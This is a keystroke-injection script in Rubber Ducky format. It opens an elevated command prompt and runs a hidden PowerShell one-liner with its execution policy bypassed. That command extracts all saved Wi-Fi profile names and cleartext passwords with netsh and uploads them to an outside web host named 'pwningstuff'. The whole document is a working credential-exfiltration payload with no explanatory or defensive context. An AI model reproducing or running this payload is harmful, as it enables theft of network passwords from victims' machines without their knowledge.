DELAY 2000
ESCAPE
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$text = (netsh wlan show profiles) | Select-String ':(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)}  | Select-String 'Key ContentW+:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }}; (Net.WebClient).UploadString('https://pwningstuff.000webhostapp.com/upload/wifi/rxc.php', $text)"
ENTER
